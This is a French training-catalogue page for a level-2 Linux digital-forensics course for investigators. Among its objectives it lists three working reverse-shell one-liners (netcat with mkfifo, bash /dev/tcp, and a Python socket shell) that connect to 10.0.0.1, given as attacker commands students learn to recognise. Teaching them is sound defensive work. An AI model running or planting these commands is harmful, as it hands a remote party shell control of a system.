Choisir une image pour le header de haut de page

FORMATIONS Formations TRACIP Linux dans l'investigation numérique - Niv 2

LINUX DANS L'INVESTIGATION NUMERIQUE - NIV 2

Descriptif du cours

Cette formation a pour but de former les participants à l'utilisation des systèmes de type GNU/LINUX.

A la fin de la formation, les participants seront capables d'utiliser de manière fluide des systèmes GNU/Linux, de les analyser et de réaliser des analyses en profondeur du système GNU/Linux.

Cette formation est composée d'une partie théorique (30%) et d'exercices pratiques (70%).

Matériel (fourni)
  1. Une machine virtuelle
  2. Support de cours au format papier (format livre de poche)
  3. Ordinateur portable de formation mis à disposition à chaque participant
Objectifs de la formation

À l’issue de la formation, les stagiaires devront :

  1. Maîtriser le système d’exploitation GNU/Linux (connaissance approfondie du fonctionnement de GNU/Linux de l’arborescence, des services, des applications présentes par défaut)
  2. Savoir faire une analyse forensique d’un système GNU/Linux cible de type ordinateur de particuliers
  3. Connaître différentes techniques d’analyse permettant de traiter un serveur compromis (analyse de logs, analyse d’artefacts, etc.)
  4. Être en mesure de comprendre des enchaînements de commandes utilisés par les attaquants ; par exemple :
    • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
    • bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
    • python -c 'import socket, subprocess, os;               	\ 
      s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);  	\ 
      s.connect(("10.0.0.1",1234)); 				\
      os.dup2(s.fileno(),0); 					\
      os.dup2(s.fileno(),1); 					\ 
      os.dup2(s.fileno(),2); 					\
      p=subprocess.call(["/bin/sh","-i"]);'
      
Prérequis & Profil des participants

Ce cours est dédié aux personnes souhaitant disposer de bases solides dans l’utilisation du système d’exploitation GNU/Linux. La dimension investigation numérique donnée à ce cours destine la formation aux enquêteurs et aux analystes forensiques.

Une connaissance basique du système GNU/Linux n’est nécessaire. Une connaissance du terminal et des utilitaires courants est indispensable.

La formation Linux Niv 1 couvre l’essentiel des connaissances nécessaires à cette formation.